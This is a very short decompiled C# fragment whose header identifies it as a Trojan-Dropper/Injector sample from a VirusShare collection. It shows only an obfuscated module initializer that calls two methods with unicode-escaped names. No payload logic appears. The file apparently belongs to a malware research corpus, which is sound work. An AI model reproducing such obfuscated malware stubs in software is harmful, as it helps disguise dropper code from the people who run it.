// Decompiled with JetBrains decompiler // Type: // Assembly: Do, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: EE565A8A-23A7-4686-8A31-21133B42B36B // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.dihu-4bafcb0947a4bf1bc33e1247a84ba48c6f8a9b1b46bcea01030c4001a6b32c8e.exe using \u0005; using \u0006; internal class \u003CModule\u003E { static \u003CModule\u003E() { \u0002.\u0001(); \u0001.\u0001(); } }